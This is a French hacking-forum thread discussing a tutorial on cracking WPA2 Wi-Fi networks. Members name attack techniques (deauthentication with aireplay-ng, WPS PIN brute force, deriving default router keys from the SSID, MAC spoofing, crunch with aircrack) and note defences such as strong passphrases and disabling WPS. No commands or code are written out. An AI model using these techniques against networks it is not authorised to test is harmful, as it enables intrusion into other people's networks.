Membre Messages : 49 Sujets : 2 Points: 5 Inscription : Jul 2013 |
RE: [HowTo] Cracker un réseau WPA2
Justement, ca sert a rien de demander a rajouter une partie securisation, c est dans l ensemble que son tuto est contraire a l ethique du hacker, il donne une liste des commandes a rentrer sans expliquer ce qu'il se passe, resultat t as lu son tutoriel et t as meme pas compris que le bf est realiser en local. Rajouter un lexique comme le demande ReVeRse c est le minimum.
Le truc qui me derange le plus, c'est le titre du thread : "[HowTo] Cracker un réseau WPA2", comme si il donnait la methode universelle a appliquer a la lettre. Y a pleins d autres methodes beaucoup plus efficaces mais qui ne marchent que dans certains cas particulier, en parler serait interessant. |
supersnail
Éleveur d'ornithorynques Messages : 1,613 Sujets : 72 Points: 466 Inscription : Jan 2012 |
RE: [HowTo] Cracker un réseau WPA2
Ce qui serait encore plus cool ce serait d'apporter des explications ou des précisions plûtot que de critiquer un tuto sur des points déjà soulevés par d'autres membres.
Bref faut croire que c'est un sport national ici, la critique non constructive, va bientôt falloir organiser des compétitions
Mon blog
Code : push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp "VIM est merveilleux" © supersnail |
c4ffein
Membre Messages : 49 Sujets : 2 Points: 5 Inscription : Jul 2013 |
RE: [HowTo] Cracker un réseau WPA2
C'est vrai que je troll sans m en rendre compte desolé. J'apportais rien parce que je m'y connais pas trop niveau wifi, mais je vais quand meme parler des quelques "astuces" que je connais :
Deauthentication: Pour recuperer un handshake il faut normalement attendre qu'un nouvel equippement se connecte, cependant il est possible avec aireplay-ng et une carte compatible avec l'injection de packets de desassocier un device et son ap, on peut donc recuperer le handshake a la reconnection. http://www.aircrack-ng.org/doku.php?id=deauthentication Je ne connais pas de solution simple pour empecher la desassociation, mais c'est pas vraiment un probleme : elle permet seulement a l attaquant de recuperer le handshake, qu'il aurait pu obtenir a la connection d un nouvel equipement. WPS: D'apres Wikipedia: Citation :Le but du protocole WPS est de simplifier la phase de configuration de la sécurité des réseaux sans fil1. Il permet à des particuliers ayant peu de connaissances sur la sécurité de configurer un accès WPA, supporté par les appareils Wi-Fi.sauf que la securite du code PIN est tres faible, je vais pas expliquer en detail, j'ai trouvé ce tuto qui le fait tres bien : http://samoht.fr/tuto/attaque-wps-par-forcebrut Pour s'en proteger il suffit de désactiver le wps. Mot de passe par defaut de la box: Pour certaines box il est possible de retrouver le mot de passe wpa par defaut a partir de l ssid, l algorithme de generation des cles etant decouvert. C'est un truc connu sur les anciennes bbox et d autres ap moins utilises, par contre je sais pas si maintenant les pass wpa sont génerés de maniere pseudo aleatoire, ou si c'est en théorie possible sur des box recentes. Dans tous les cas, c'est toujours mieux de changer le pass par defaut. |
Serphentas
Thall Messages : 41 Sujets : 10 Points: 29 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
Oui, je sais, c'est un tuto qui explique comment faire X et Y. Mais je ne dis en aucun point que c'est la seule et la meilleur des manières de faire du cracking de WPA ! Qui plus est, les tutos sur les BOF je comprends pas trop non plus. J'en ai fait des recherches Google pour comprendre ne serait-ce qu'un tiers du tuto.
Bref, comme dit avant, un ajout est dans les studios alors avec un peu de patience, ce tuto sera un poil plus correspondant avec l'éthique du site. PS: Un tuto BOF on peut très bien l'utiliser à mal pour, par exemple, trouver des infos admin sur un ordi d'université ou autre. Je ne fais que donner des infos. |
c4ffein
Membre Messages : 49 Sujets : 2 Points: 5 Inscription : Jul 2013 |
RE: [HowTo] Cracker un réseau WPA2
Je vais faire du gros hs, mais bon on est plus a un post hs pres.
La majorite des tutos sur les bof sont depasser, y a pleins de protections avec les nouveaux proco/os qui font que c'est plus aussi facile qu avant, le mieux pour apprendre c est de s entrainer avec les vieux tutos connus (comme ca t es sur que tu lis pas nimporte quoi) sur des vm, si t as la flemme d en creer pour t entrainer inscris toi ici http://www.zenk-security.com/epreuves.php et fait les failles applicatives, j me souviens plus trop mais j crois que c est a partir du medium sans aslr les bof. Et j'ai jamais critiquer le fait que tu donne des infos qui peuvent etre mal utilisees, mais la forme : une liste de commandes a rentrer dans le terminal et une explication rapide, c'est pas le mieux pour comprendre, et ca peut permettre aux skids de s amuser sur la box du voisin. |
Serphentas
Thall Messages : 41 Sujets : 10 Points: 29 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
Me revoilà ! Après avoir vaincu les dragons des plains de Drek'thar, j'ai pu trouver le chemin vers n-pn. Bref:
La prog et moi ça se limite au Java (cours de base au collège). Du coup, scripter des trucs anti-crack c'est assez compliqué. Néanmoins, je peux vous exposer le fonctionnement logique d'un éventuel script que quelqu'un d'ici pourrait écrire. Le voici: http://pbrd.co/1neihT1 D'ailleurs, j'ai, dans ce tutoriel, montré comment procéder au crack/sniffing d'un réseau Wi-Fi. Pour sécuriser le sien, il suffit de prendre le tuto à l'envers. Par exemple, restreindre l'AP aux appareils dont l'adresse MAC est connue et enregistrée dans une table du routeur. J'attends vos commentaires/suggestions/etc. (20-11-2013, 00h18)c4ffein a écrit : une liste de commandes a rentrer dans le terminal et une explication rapide, c'est pas le mieux pour comprendre, et ca peut permettre aux skids de s amuser sur la box du voisin. Il peut faire ce qu'il veut, il va buter sur deux choses essentielles: 1) cracker avec des tables, c'est long, et le packet monkey typique n'a pas un cluster de serveurs 4U avec 4 Opterons 16 coeurs. Donc rien qu'à ce niveau, il est mal barré. Son MacBook Patate va pas le mener très loin. 2) stocker des tables (rainbow ou de mot de passe) ça prend énormément de place. Même moi qui me suis récemment fait plaisir avec quelques disques durs spacieux (RAIDz2 pour les intéressés) je ne pourrais stocker de quoi cracker des mots de passe moyens. 3) trouver les bonnes tables, c'est dur (surtout pour les MDP). Tout simplement. Donc le kiddie il pourra se la péter devant les alléchantes femelles qu'il n'aura jamais dans sa vie en lui montrant du CLI. Rien de plus. |
c4ffein
Membre Messages : 49 Sujets : 2 Points: 5 Inscription : Jul 2013 |
RE: [HowTo] Cracker un réseau WPA2
(06-02-2014, 23h57)Serphentas a écrit : Par exemple, restreindre l'AP aux appareils dont l'adresse MAC est connue et enregistrée dans une table du routeur.Ca change presque rien, tu peux pas empecher le mac spoofing, pour securiser un bon gros pass ca suffit (et desactiver le wps si il l est) (06-02-2014, 23h57)Serphentas a écrit : Donc le kiddie il pourra se la péter devant les alléchantes femelles qu'il n'aura jamais dans sa vie en lui montrant du CLI. Rien de plus.Je sais, mais je critique pour le principe |
Di0Sasm
Chimiste Messages : 924 Sujets : 56 Points: 91 Inscription : Aug 2011 |
RE: [HowTo] Cracker un réseau WPA2
Laisser moi le wps personnes s'en pré-occupe, on se croit au États-Unis Wifi partout.
|
Serphentas
Thall Messages : 41 Sujets : 10 Points: 29 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
Ouais, c'est vrai que tu peux vite changer de MAC. Ma foi, c'est comme ça... Comme t'as dit, avoir un pass avec une entropie suffisante et pas de WPS suffit à avoir une sécurité décente.
D'accord. J'ai posté tout ça pour montrer un peu comment ça se passe, pour qu'éventuellement ça mène à des contre-mesures ou à des débats. @DI0Sasm: Pas compris :p |
WagoO
Newbie Messages : 1 Sujets : 0 Points: 0 Inscription : Mar 2020 |
RE: [HowTo] Cracker un réseau WPA2
Bonjour tous le mondes, je me demandais si les blackshat auraient conçu une solution au problème des wordlists infiniment trop lourde. Y'aurait il un outil, qui permettrai de combiner l'action de crunch a celle d'air-crack sans passer par la création d'un fichier lourd ? Bonne journée
|